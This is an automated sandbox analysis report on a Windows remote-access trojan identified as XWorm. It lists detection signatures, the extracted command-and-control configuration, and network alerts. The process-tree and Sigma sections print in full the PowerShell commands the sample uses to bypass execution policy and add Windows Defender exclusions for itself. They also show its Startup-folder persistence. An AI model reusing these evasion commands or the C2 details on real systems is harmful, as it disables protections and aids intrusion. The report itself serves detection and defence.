Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
THITWNSEI24112908089786756456545346568789-00010.scr.exe

Overview

General Information

Sample name:THITWNSEI24112908089786756456545346568789-00010.scr.exe
Analysis ID:1566987
MD5:dd81e5afcd1a13eee9f9a28c6cde2a56
SHA1:cf99a76fc406ffd81c62fbf07bd65c80eeae293f
SHA256:b399f5d239807fe144ad8872b4111002ebc6bb79ea6faa417db37f5ff95100ee
Tags:AsyncRATexeuser-threatcat_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • THITWNSEI24112908089786756456545346568789-00010.scr.exe (PID: 4916 cmdline: "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe" MD5: DD81E5AFCD1A13EEE9F9A28C6CDE2A56)
    • THITWNSEI24112908089786756456545346568789-00010.scr.exe (PID: 3564 cmdline: "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe" MD5: DD81E5AFCD1A13EEE9F9A28C6CDE2A56)
      • powershell.exe (PID: 5960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'THITWNSEI24112908089786756456545346568789-00010.scr.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 1176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["104.250.180.178"], "Port": 7061, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4573179094.0000000003301000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000003.00000002.4558499352.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xcb33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xcbd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xcce5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xc14d:$cnc4: POST / HTTP/1.1
      00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000002.2157295618.0000000003071000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x16e67:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x6e177:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x872fb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x16f04:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x6e214:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x87398:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x17019:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x6e329:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x874ad:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x16481:$cnc4: POST / HTTP/1.1
        • 0x6d791:$cnc4: POST / HTTP/1.1
        • 0x86915:$cnc4: POST / HTTP/1.1
        Click to see the 3 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.30d2444.4.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xaf33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xafd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xb0e5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xa54d:$cnc4: POST / HTTP/1.1
          3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xcd33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xcdd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xcee5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xc34d:$cnc4: POST / HTTP/1.1
            0.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.307b134.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 6 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe", ParentImage: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe, ParentProcessId: 3564, ParentProcessName: THITWNSEI24112908089786756456545346568789-00010.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', ProcessId: 5960, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe", ParentImage: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe, ParentProcessId: 3564, ParentProcessName: THITWNSEI24112908089786756456545346568789-00010.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', ProcessId: 5960, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe", ParentImage: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe, ParentProcessId: 3564, ParentProcessName: THITWNSEI24112908089786756456545346568789-00010.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', ProcessId: 5960, ProcessName: powershell.exe
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe, ProcessId: 3564, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe", ParentImage: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe, ParentProcessId: 3564, ParentProcessName: THITWNSEI24112908089786756456545346568789-00010.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe', ProcessId: 5960, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T22:05:43.176015+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:05:44.790619+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:05:55.884093+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:06.994799+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:13.138814+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:18.105775+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:29.234953+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:33.158204+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:39.610174+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:41.029021+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:41.268597+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:43.128361+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:43.628687+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:44.488521+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:46.578848+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:48.988967+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:00.435045+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:10.690522+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:12.908911+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:13.148654+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:18.263880+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:23.913779+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:28.501242+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:28.740956+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:28.978533+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:29.219260+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:37.278608+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:39.555199+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:43.140971+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:44.372757+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:49.482576+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:49.718348+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:50.008027+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:59.940548+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:08:00.271031+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:08:00.543720+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:08:05.428683+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:08:13.145222+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:08:16.208356+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:08:27.338646+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:08:36.499975+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:08:40.998799+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:08:41.258519+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:08:43.139674+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:08:43.438469+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:08:50.521751+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:09:02.341593+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:09:08.038302+010028528701Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T22:05:44.792711+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:05:55.885979+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:06:07.009201+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:06:18.129003+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:06:29.243496+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:06:33.249214+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:06:39.614440+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:06:41.030624+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:06:41.270089+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:06:41.572434+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:06:43.630432+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:06:44.492086+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:06:46.585300+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:06:48.990594+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:00.440880+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:10.692084+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:12.915369+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:13.403770+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:13.920690+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:18.266927+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:23.922106+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:28.502759+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:28.743182+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:28.983451+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:29.221134+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:37.285940+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:39.557443+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:44.374746+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:49.491448+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:49.719946+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:50.009606+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:07:59.947483+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:08:00.275330+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:08:00.545398+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:08:05.431454+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:08:16.212491+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:08:27.342286+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:08:36.503489+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:08:41.001640+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:08:41.260237+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:08:43.440421+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:08:50.527074+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:09:02.344563+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              2024-12-02T22:09:08.039041+010028529231Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T22:05:43.176015+010028528741Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:13.138814+010028528741Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:06:43.128361+010028528741Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:13.148654+010028528741Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:07:43.140971+010028528741Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:08:13.145222+010028528741Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              2024-12-02T22:08:43.139674+010028528741Malware Command and Control Activity Detected104.250.180.1787061192.168.2.649770TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-02T22:07:28.169006+010028531931Malware Command and Control Activity Detected192.168.2.649770104.250.180.1787061TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Roaming\XClient.exeAvira: detection malicious, Label: HEUR/AGEN.1309499
              Found malware configuration
              Source: 00000003.00000002.4573179094.0000000003301000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["104.250.180.178"], "Port": 7061, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\XClient.exeReversingLabs: Detection: 44%
              Multi AV Scanner detection for submitted file
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeReversingLabs: Detection: 42%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\XClient.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpackString decryptor: 104.250.180.178
              Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpackString decryptor: 7061
              Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpackString decryptor: <123456789>
              Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpackString decryptor: <Xwormmm>
              Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpackString decryptor: XWorm V5.2
              Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpackString decryptor: USB.exe
              Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpackString decryptor: %AppData%
              Source: 3.2.THITWNSEI24112908089786756456545346568789-00010.scr.exe.400000.0.unpackString decryptor: XClient.exe
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
